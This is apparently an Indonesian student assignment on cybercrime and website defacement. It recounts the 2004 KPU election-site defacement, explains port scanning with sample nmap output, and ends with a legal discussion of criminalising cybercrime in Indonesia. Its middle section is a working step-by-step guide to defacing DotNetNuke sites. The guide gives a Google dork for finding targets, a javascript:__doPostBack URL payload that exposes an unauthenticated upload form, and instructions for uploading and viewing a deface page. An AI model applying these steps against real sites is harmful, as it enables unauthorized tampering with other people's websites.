Tugas 2 Cyber Crime dengan teknik Deface

Penyalahgunaan teknologi salah satunya adalah penipuan dan kejahatan di dunia maya sangat meresahkan user pengguna internet. Cracker lah yang selalu di tunjuk sebagai penyebabnya. Kegiatan cracking pun tidak hanya terjadi pada situs-situs yang memberi fasilitas kepada user untuk kemudahan dalam bertranskasi seperti situs bank, situs perdagangan online, namun juga berlaku untuk situs-situs pemerintah.

Hal ini yang selanjutnya disebut Cybercrime. Kejahatan di dunia maya dirumuskan sebagai perbuatan melawan hukum yang dilakukan dengan memakai jaringan komputer sebagai sarana/ alat atau komputer sebagai objek, baik untuk memperoleh keuntungan ataupun tidak, dengan merugikan pihak lain.

Tentunya masih hangat dalam pikiran kita saat seorang hacker bernama Dani Hermansyah, pada tanggal 17 April 2004 melakukan deface dengan mengubah nama – nama partai yang ada dengan nama- nama buah dalam website http://www.kpu.go.id yang mengakibatkan berkurangnya kepercayaan masyarakat terhadap Pemilu yang sedang berlangsung pada saat itu. Dikhawatirkan, selain nama – nama partai yang diubah bukan tidak mungkin angka-angka jumlah pemilih yang masuk di sana menjadi tidak aman dan dapat diubah, padahal dana yang dikeluarkan untuk sistem teknologi informasi yang digunakan oleh KPU sangat besar sekali. Untung sekali bahwa apa yang dilakukan oleh Dani tersebut tidak dilakukan dengan motif politik, melainkan hanya sekedar menguji suatu sistem keamanan yang biasa dilakukan oleh kalangan underground (istilah bagi dunia Hacker).

Deface adalah pembajakan situs web dan merupakan salah satu kegiatan yang sering dilakukan oleh cracker adalah mengubah halaman web. Cara yang dilakukan adalah mengeksploitasi lubang kemanan.

Probing dan port scanning.

Salah satu langkah yang dilakukan cracker sebelum masuk ke server yang ditargetkan adalah melakukan pengintaian. Cara yang dilakukan adalah dengan melakukan “port scanning” atau “probing” untuk melihat servis-servis apa saja yang tersedia di server target. Sebagai contoh, hasil scanning dapat menunjukkan bahwa server target menjalankan program web server Apache, mail server Sendmail, dan seterusnya. Analogi hal ini dengan dunia nyata adalah dengan melihat-lihat apakah pintu rumah anda terkunci, merek kunci yang digunakan, jendela mana yang terbuka, apakah pagar terkunci (menggunakan firewall atau tidak) dan seterusnya. Yang bersangkutan memang belum melakukan kegiatan pencurian atau penyerangan, akan tetapi kegiatan yang dilakukan sudah mencurigakan. Apakah hal ini dapat ditolerir (dikatakan sebagai tidak bersahabat atau unfriendly saja) ataukah sudah dalam batas yang tidak dapat dibenarkan sehingga dapat dianggap sebagai kejahatan? Berbagai program yang digunakan untuk melakukan probing atau portscanning ini dapat diperoleh secara gratis di Internet. Salah satu program yang paling populer adalah “nmap” (untuk sistem yang berbasis UNIX, Linux) dan “Superscan” (untuk sistem yang berbasis Microsoft Windows). Selain mengidentifikasi port, nmap juga bahkan dapat mengidentifikasi jenis operating system yang digunakan.

Contoh program nmap yang digunakan untuk probing dan port scanning. Selain mengidentifikasi port, nmap juga bahkan dapat mengidentifikasi jenis operating system yang digunakan.

budi@router:~$ nmap localhost

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, http://www.insecure.org/nmap/)

Interesting ports on localhost (127.0.0.1):

Port    State       Protocol  Service

21      open        tcp        ftp

22      open        tcp        ssh

25      open        tcp        smtp

53      open        tcp        domain

80      open        tcp        http

110     open        tcp        pop-3

111     open        tcp        sunrpc

143     open        tcp        imap2

1008    open        tcp        ufsd

3128    open        tcp        squid-http

Nmap run completed — 1 IP address (1 host up) scanned in 1 second

Berikut ini cara penerapan teknik deface dengan DNN (DotNetNuke) :

1. Siapkan file deface anda

2. Mencari target web

Dork => inurl:”/portals/0 dan inurl:”Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx

3. Jika sudah dapat target , waktunya beraksi

Setelah kita search digoole dan menemukan target.

Contoh => http://sitetarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx.

Hingga muncul tampilan seperti ini

Lalu klik/ceklist Link Type: => File ( A File On Your Site )

Setelah di klik atau block,hapus link di URL..

http://sitetarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Lalu masukan ini di URL =>javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

Kemudian tekan Enter.

Maka akan muncul menu Browse seperti tampilan di bawah ini

Lalu silahkan Upload desain atau halaman deface dari komputer atau PC anda, contoh  coba_deface.txt

klik => Upload Selected File

Jika sudah terupload,maka file deface kamu telah masuk ke server tersebut.

Selesai upload nanti kelihatan di File Name contoh: coba_deface.txt

Untuk melihat hasilnya nama web/Portals/0/nama file

contoh : http://situstarget.com/portals/0/coba_deface.txt

Catatan : Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob

admin dapat mengubah ini. Sudah dipraktek kan di windows XP, dan bisa juga disemua windows.

Lalu bagaimana undang-undang di Indonesia yang mengatur tentang CyberCrime ini. Baru sebatas rancangan yang sudah dibuat sejak tahun 2000 oleh Departemen Komunikasi dan Informasi. Revisi terakhir dari rancangan undang-undang tindak pidana di bidang teknologi informasi sejak tahun 2004 sudah dikirimkan ke Sekretariat Negara RI serta dikirimkan ke DPR, namun dikembalikan kembali ke Departemen Komunikasi dan Informasi untuk diperbaiki.

Berkaitan dengan kebijakan kriminalisasi terhadap perbuatan yang masuk dalam kategori cybercrime sebagai tindak pidana sebagaimana diulas dalam buku tersebut di atas, ada beberapa tanggapan yang hendak dikemukakan, yaitu:

• Persoalan kriminalisasi timbul karena dihadapan kita terdapat perbuatan yang berdimensi baru, sehingga muncul pertanyaan adakah hukumnya untuk perbuatan tersebut. Kesan yang muncul kemudian adalah terjadinya kekosongan hukum yang akhirnya mendorong kriminalisasi terhadap perbuatan tersebut.[8] Sebenarnya dalam persoalan cybercrime, tidak ada kekosongan hukum, ini terjadi jika digunakan metode penafsiran yang dikenal dalam ilmu hukum dan ini yang mestinya dipegang oleh aparat penegak hukum dalam menghadapi perbuatan-perbuatan yang berdimensi baru yang secara khsusus belum diatur dalam undang-undang.[9] Persoalan menjadi lain jika ada keputusan politik untuk menetapkan cybercrime dalam perundang-undangan tersendiri di luar KUHP atau undang-undang khusus lainnya. Sayangnya dalam persoalan mengenai penafsiran ini, para hakim belum sepakat mengenai kateori beberapa perbuatan. Misalnya carding, ada hakim yang menafsirkan masuk dalam kateori penipuan, ada pula yang memasukkan dalam kategori pencurian. Untuk itu sebetulnya perlu dikembangkan pemahaman kepada para hakim mengenai teknologi informasi agar penafsiran mengenai suatu bentuk cybercrime ke dalam pasal-pasal dalam KUHP atau undang-undang lain tidak membingungkan.
• Dilihat dari pengertian kriminalisasi, sesungguhnya kriminalisasi tidak harus berupa membuat undang-undang khusus di luar KUHP, dapat pula dilakukan tetap dalam koridor KUHP melalui amandemen. Akan tetapi proses antara membuat amandemen KUHP dengan membuat undang-undang khusus hampir sama, baik dari segi waktu maupun biaya, ditambah dengan ketidaktegasan sistem hukum kita yang tidak menganut sistem kodifikasi secara mutlak, menyebabkan munculnya bermacam-macam undang-undang khusus.

Kriminalisasi juga terkait dengan persoalan harmonisasi, yaitu harmonisasi materi/substansi dan harmonisasi eksternal (internasional/global). Mengenai harmonisasi substansi, bukan hanya KUHP yang akan terkena dampak dari dibuatnya undang-undang tentang cybercrime. Kementerian Komunikasi dan Informasi RI mencatat ada 21 undang-undang dan 25 RUU yang akan terkena dampak dari undang-undang yang mengatur cybercrime. Ini merupakan pekerjaan besar di tengah kondisi bangsa yang belum stabil secara politik maupun ekonomi. Harmonisasi eksternal berupa penyesuaian perumusan pasal-pasal cybercrime dengan ketentuan serupa dari negara lain, terutama dengan Draft Convention on Cyber Crime dan pengaturan cybercrime dari negara lain. Harmonisasi ini telah dilaksanakan baik dalam RUU PTI, RUU IETE, RUU ITE, RUU TPTI maupun dalam RUU KUHP. Judge Stenin Schjolberg dan Amanda M. Hubbard mengemukakan dalam persoalan cyber crime ini diperlukan standardisasi dan harmoonisiasi dalam tiga area, yaitu legislation, criminal enforcement dan judicial review. Ini menunjukkan bahwa persoalan harmonisasi merupakan persoalan yang tidak berhenti dengan diundangkannya undang-undang yang mengatur cybercrime, lebih dari itu adalah kerjasama dan harmonisasi dalam penegakan hukum dan peradilannya.

• Berkaitan dengan harmonisasi substansi, ada yang bagian yang tak disinggung dalam buku tersebut, terutama mengenai jenis pidana. Mengingat cybercrime merupakan kejahatan yang menggunakan atau bersaranakan teknologi komputer, maka diperlukan modifikasi jenis sanksi pidana bagi pelakunya. Jenis sanksi pidana tersebut adalah tidak diperbolehkannya/dilarang sipelaku untuk menggunakan komputer dalam jangka waktu tertentu. Bagi pengguna komputer yang sampai pada tingkat ketergantungan, sanksi atau larangan untuk tidak menggunakan komputer merupakan derita yang berat. Jangan sampai terulang kembali kasus Imam Samudera – terpidana kasus terorisme Bom Bali I – yang dengan leluasa menggunakan laptop di dalam selnya.
• Setelah harmonisasi dilakukan, maka langkah yang selanjutnya adalah melakukan perjanjian ekstradisi dengan berbagai negara. Cybercrime dapat dilakukan lintas negara sehingga perjanjian ekstradisi dan kerjasama dengan negara lain perlu dilakukan terutama untuk menentukan yurisdiksi kriminal mana yang hendak dipakai. Pengalaman menunjukkan karena ketiadaan perjanjian ekstradisi, kepolisian tidak dapat membawa pelaku kejahatan kembali ke tanah air untuk diadili.
• Hal lain yang luput dari perhatian adalah pertanggungjawaban Internet Service Provider (ISP) sebagai penyedia layanan internet dan Warung Internet (Warnet) yang menyediakan akses internet. Posisi keduanya dalam cybercrime cukup penting sebagai penyedia dan jembatan menuju jaringan informasi global, apalagi Warnet telah ditetapkan sebagai ujung tombak untuk mengurangi kesenjangan digital di Indonesia. Bentuk pertanggungjawaban pidana apa yang mesti mereka terima jika terbukti terlibat dalam cybercrime. Apakah pertanggungjawabannya dibebankan secara individual atau dianggap sebagai suatu korporasi. Ini akan memiliki konsekuensi tersendiri.